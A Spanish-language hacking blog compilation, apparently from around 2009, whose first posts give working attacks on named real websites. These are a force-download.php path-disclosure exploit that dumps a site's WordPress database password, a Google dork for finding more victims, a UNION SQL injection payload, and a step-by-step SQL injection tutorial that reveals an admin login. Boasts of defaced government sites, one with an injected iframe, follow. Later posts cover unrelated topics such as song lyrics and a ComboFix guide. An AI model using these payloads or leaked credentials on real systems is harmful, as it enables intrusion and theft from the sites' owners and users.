Explotando Full Source Diclosure Bugueando "force-download.php"

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.

simplemente tenemos la web:

http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php

http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:

http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:

/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:

require_once( dirname(__FILE__) . '/wp-load.php' );


http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php

Código:

/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');

/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');

/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');

/** MySQL hostname */
define('DB_HOST', 'localhost');

y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking

dork: "allinurl: "force-download.php?file= .pdf""

La Seguridad en Algunos servidores.

Es triste encontrar este tipo de seguridad en servidores como este. que ah muchos les hacen creer que son los mas seguros de la red, cuando no es asi. aqui les dejo unos screens de uno que me encontre que tieme mas de 30 sitios a su merced...
nota: no son todos los dominios....











Bug en web desarrolladora SUSTAM.COM


ahi haciendo un poco de pen-testing encontre una web con SQLi aqui les dejo la info

++++++++++++++++++++++++++++++++++++++++++++++++++++
web desarrolladora: SUSTAM.COM

Bug: SQLi

****************************************************
tabla:
administradores

****************************************************
columnas:

usuarios

clave
****************************************************
inyection:

-1+union+select+0,1,2,concat(usuario,0x3a,clave),4,5,6,7,8,9,10,11,12,13+from+administradores--

dato: varian los numeros de tablas en las webs, la vulnerable con mas frecuencia es la 3
*****************************************************
panel:

/admin
*****************************************************
DNSreverse:

http://www.ip-adress.com/reverse_ip/sustam.com
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

server info:
Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8. PHP/4.4.7
Kernel: Linux sustam02.sustam.com 2.6.18-128.2.1.el5PAE #1 SMP Tue Jul 14 07:15:01 EDT 2009 i686

Tutorial Ijection SQL

##########################################################################################
## TUTORIAL INJECTION SQL By Gothic-X ##
## ##
## Greetz: Version 1.1 ##
## || Zer0-z0oRg || Zues || Kaos || Dont.Cool || Murder || Knet || Fr34k || ##
## ##
## www.undermx.blogspot.com ##
## ##
## ##
## ##
##########################################################################################

WEB: http://directinformatica.es/
METODO DE ATAQUE: SQL INJECTION

Bueno empesaremos con buscar la parte de la web donde es vulnerable en este caso sera en
http://directinformatica.es/detalle.php?id= verificamos si es vulnerable haciendo una
consulta con solo ponerle ( ' ) una coma.
efectivamente este sitio es vulnerable a sql, como savemos? por que nos arrojo un mensaje de
error el cual es el siguiente.

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gedraqxj/public_html/detalle.php on line 35

el cual nos indica que es vulnerable. bueno agora buscaremos cuantas columnas tiene el sitio agregando
lo siguiente al fina de la url de la web ( detalle.php?id=-1+union+select+0,1,2,3,4,..., en este caso tiene
9 columnas osea quedaria de la siguienteforma.

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,8--

entrando veremos que nos arrojo unos numeritos en la web en este caso fueron : 8 , 4 , 2 .

ya estando aqui veremos si la web tiene information schema de manera que quede de esta forma:
agregando al final +from+information_schema.tables-- y reemplazando cualquiera de los numeros
nos arrojo la web por table_name quedando la url de la aiguiente manera;

http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema--

perfecto nos arrojo un texto CHARACTER_SETS el cual es una tabla y con eso confirmamos que tiene
information schema, ahora buscaremos la tabla de usuario, usuarios o admin agregando al final
+limit+1,1-- y quedaria de esta forma:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+1,1--

ahora para que encontremos la tabla deseada avansaremos en el primer uno del limit de la siguiente manera. +limit+2,1--
hasta ncontrar la tabla deseada. en esta web se tubo que avansar 20 para la tabla deseada y quedo de la siguiente manera
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,table_name+from+information_schema.tables+limit+20,1--
y nos dio como resultado: adm_usuario
ahora como ver lo que esta dentro de la tabla, osea ver las columnas, bueno primero convertiremos la tabla a hexadecimal
usualmente uso esta herramienta http://hwagm.elhacker.net/php/sneak.php, bueno nos dio como resultado: 61646d5f7573756172696f
bueno al final de la url de la injection aditaremos el final reemplazando .tables+limit+20+1-- por columns+where(table_name=0xaquitabalaenhex)-- y
donde tenemos table_name lo reemplazamos por column_name y nos quedaria de la siguiente manera.
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,column_name+from+information_schema.columns+where(table_name=0x61646d5f7573756172696f)--
y vemos que nos arroja las columnas y para ir encontrando las columnas deseadas avansamos con +limit+1,1-- cambiando el 1 por 2 y asi susesivamente
hasta encontrar las columnas deseadas.
en esta web encontramos las siguientes columnas:
id_user, id_tipo, nomb_user , nick_user , pass_user , acti_user
bien ya con esas tenemos las esenciales que son nomb_user y pass_user.
ahora como vemos dentro de las columnas? bueno solo reemplazamos el fina despues de +from+ y agregamos el nombre de la tabla que es
adm_usuario y donde tenemos column_name reemplazamos por concat(columna,0x3a,columna) el 0x3a esta en hexadecimal y es ( : ), entonces
nos quedaria de la siguiente manera nuestra url:
http://directinformatica.es/detalle.php?id=-1+union+select+0,1,2,3,4,5,6,7,concat(nick_user,0x3a,pass_user)+from+adm_usuario--
y nos arrojara nuestra informacion deseada que es la siguiente: admin:matias1
ahora solo nos falta encontrar el admin panel, en la siguiente web es http://directinformatica.es/cms/
y nos logeamos y hacemos lo que tengamos que hacer.

THE END.

http://www.santaclara.gob.mx/ Owned

Bueno aqui seguimos demostrando la inseguridad del Gobierno de mexico.
un Owned mas al Gobierno.
Web: H. Ayuntamiento de Salvador Escalante
Url: http://www.santaclara.gob.mx/
Mirror: http://www.zone-h.org/mirror/id/8982580
Tipo de ataque: Sql Inyection.
screen:

dicadeteatro.com.br Owned

bueno aqui les dejo una web mas owneada x mi amm metodo sql inyecction
ahi nada mas le agregue un pequeño iframe xD lolazo yo y en fin espero que les guste
http://dicadeteatro.com.br/

MiniMetraje Minimalista

Navegando sobre los blogs de los amigos informaticos encontre en Èter Blog un post algo especial.
este es un minimetraje que es? bueno aqui se los dejo para que lo vean y digan que ven.

http://eterblog.com/2009/05/21/videos/minimetraje-minimalista/

opinen y observen con mucho cuidado. :p

Saludos a Oscar Rovira creador del minimitraje

Ayer pedi que te murieras - Victor Garcia

Pues sin nada mas que decir...


AYER PEDI QUE TE MURIERAS
QUE TE CARGARA LA TRISTEZA
QUE TODO EL MUNDO TE OLVIDARA
QUE TU BELLEZA SE ACABARA
PARA QUE NADIE TE QUISIERA

AYER PEDI CON TANTA FUERZA
QUE TODO EL MAL QUE HAY EN LA TIERRA
SOBRE LA ESPALDA TE CAYERA
PARA QUE YO LO DISFRUTARA
PARA QUE TU LO PADECIERAS

--CORO--
AYER PEDI QUE TE MURIERAS
POR QUE TE ODIO DE ADEVERAS
PERO ESTE IDIOTA CORAZON
QUE ES MUCHO MAS FUERTE QUE YO
TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO
POR QUE TE AMO COMO A NADIE
POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL

ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS VOY A OLVIDARTE POR QUE TENDRE QUE ACOSTUMBRARME A VIVIR AMANDOTE, ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.


AYER PEDI CON TANTA FUERZA QUE TODO EL MAL QUE HAY EN LA TIERRA SOBRE LA ESPALDA TE CALLERA, PARA QUE YO LO DISFRUTARA PARA QUE TU LO PADECIERAS

AYER PEDI QUE TE MURIERAS POR QUE TE ODIO DE ADEVERASPERO ESTE IDIOTA CORAZON QUE ES MUCHO MAS FUERTE QUE YO TAMBIEN ME OBLIGA A QUE TE QUIERA.

ESTOY A PUNTO DE VOLVERME LOCO POR QUE TE AMO COMO A NADIE POR QUE JAMAS PODRE ARRANCARME TUS CARICIAS DE MI PIEL, ESTOY A PUNTO DE VOLVERME LOCO POR QUE JAMAS PODRE OLVIDARTE POR QUE TENDRE QUE CONSTUMBRARME A VIVR AMANDOTE, ALGUNA CUMPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINE.

ALGUNA CULPA ESTOY PAGANDO POR QUE TE ODIO Y TE AMO TANTO COMO JAMAS LO IMAGINEEE

Y HOY SOLO QUIERO QUE TU VUELVAS.

Instituto Academico de Investigaciones y Capacitacion Electoral

Web: Instituto Academico de Investigaciones y Capacitacion Electoral
Url: http://www.teem.gob.mx/tribunal/
Mirror: http://www.zone-h.org/mirror/id/8940122
Tipo de ataque: Sql Inyection.
screen:

ComboFix

Bue.. no les ah pasado que derrepente no peuden entrar al admin de tareas o se les cierra el cmd o mamadas asi? bueno aqui la solucion.

Pequeña y potente herramienta, sirve para eliminar infecciones producidas por SurfSideKick, QooLogic, Vundo, Look2Me y la combinación de todo el grupo.

Además es puesta al día con bastante regularidad.

Modo De Uso:

1. Se descarga combofix.exe en una carpeta para ella propia.

2. Hacemos Doble clic en su ejecutable combofix.exe. Los iconos del Escritorio desaparecerán (esto es normal) y aparecerá el mensaje Performing a scan of your machine.

3. A continuación, se mostrará el mensaje Preparing a log report. This takes a while. So, please be patient.

4. Seguidamente, aparecerán los mensajes Almost done…. A report of Combofix’s actions would be produced at C:\Combofix.txt.

5. Espera a que la ventana del programa se cierre sola y nos muestre el archivo C:\Combofix.txt. Los iconos del Escritorio volverán a su sitio sin necesidad de tener que reiniciar el PC.

6.Ya tenemos el informe combofix.txt que nos mostrará los archivos detectados y eliminados relacionados con los Adware SurfSideKick, QooLogic y Look2Me3.

Importante:

Cuando se usa ComboFix hay que tener desactivado cualquier otra suit de seguridad

Es importante desinstalar y borrar cualquier rastro de ComboFix una vez realizada la limpieza, sigue los siguientes pasos:
Ve a Inicio -> Ejecutar -> Teclea o copia y pega el siguiente comando y pulsa Enter: ComboFix /u

Después de unos segundos aparecerá la ventana ComboFix is uninstalled.
En caso de no haber podido desinstalar ComboFix satisfactoriamente, elimina el ejecutable de la utilidad donde lo descargaste (normalmente en el Escritorio) y elimina también la carpeta ComboFix ubicada en la unidad C:\.

Para cualquier duda, pásate por el foro de seguridad informática y expongala, seguro le ayudaran.

Licencia: Freeware (Gratuita)
S.O.: Win 98/Me/2000/XP
Versión: 0.1

Descarga:

Descarga: BleepingComputer.com

Las 10 chicas mas guapas y geeks

Ahora te traemos la lista de las 10 chicas mas guapas y Geeks que el sitio Askmen.com ha seleccionado por su trabajo y cercania con el mundo de la tecnologia…

1. Amber MacArthur - A trabajado para Microsoft y Razorfish








2. Morgan Webb - Podcast WebbAlert y presentadora del programa de videojuegos X-Play

3. Jessica Chobot - Famosa por una foto con una PSP, actualmente hace articulos sobre videojuegos

4. Olivia Munn - Presentadora de programas sobre nuevas tecnologias

5. Cali Lewis - Creadora de un portal dedicado a los podcast

6. Veronica Belmont - Algunos podcast

7. Amanda Congdon - Tiene su propio videoblog y presenta un popular podcast semanal

8. Kristin Holt - Presentadora y reportara tecnologica

9. Blair Butler - Guionista del programa de videojuegos X-Play

10. Wendy Cheng - Bloguera y participa en el videopodcasts para clicknetwork.tv

Hay que hacer nuestra propia lista no creen… propongo a la chica de Telurica y a la de Mobuzz Tv… quien propone mas???

El árbol de navidad más friki/geek

arbol de navidad friki

Nuestros amigos Juan y Carolina, de Clipset.net han encontrado este curioso árbol de navidad situado al lado del Corte Inglés de Azca, en Madrid.

Y digo curioso ya que sus luces forman uno de los juegos más conocidos de todos los tiempos, el Pac-Man. Y nada mejor que ver a Carolina presentándolo:

Podrán haber árboles de navidad más bonitos, pero nunca más geeks que éste. Así que si algún madrileño pasa a verlo, que no dude en echarse una foto junto al árbol y enviárnosla.

GAP [GrupoAnti-Pedofilia]

Bueno ahora viene este nuevo grupo con bastantes ganas de sacar la basura de la red
para dar batalla a esa gente enferma, sin cerebro, sin sentimientos.

Si tienes información, ya sea websites, emails, nombres, etc.
no dudes en adjuntarla en este post, mientras GAP crea el
sistema de Agregado de información anónima, para que te veas involucrado
al 0% por si tienes dudas, etc.

Apúntate y ayuda con información.

Si Deseas dejar informacion, simplemente dejala en un comentario! ó si quieres hacerlo de manera anonima, manda un email a gapconect@gmail.com

ATTE GAP

Dejando el "Fabricado y con soporte de" en win xp

Bien eh visto que haveces los tecnicos que dan mantenimiento a cyber o pc personales
dejan una imagen en propiedades como la siguiente:

y me eh puesto a investigar =D, lo unico que hay que hacer es tener 3 pequeños archivos
y ponerlos en C:\windows\system32
lo unico que hay que editar es el archivo llamado oeminfo lo abren y editan
y cambiar el logo que trae " el mio " por el de ustedes
yo le tengo puesto una imagen com formato .bmp se sugiere usar ese mismo formato
y con medidadas de 100x100 px.
despues de ponerlos en system32 ejecutar el .bat que trae el archivo llamado RUTINAS (pueden ver el bat
para que no haya malos entendidos y digan que quiero joder sus pcs) Y listo ya pueden ir a las propiedades
de sistema para ver como quedo.

DESCARGA DE ARCHIVO:

http://rapidshare.com/files/181387572/soporte.rar

PD. no se rian de la velocidad de mi pc >.< Lengua
pd2: si tienen dudas posteen nomas y haver que solucion damos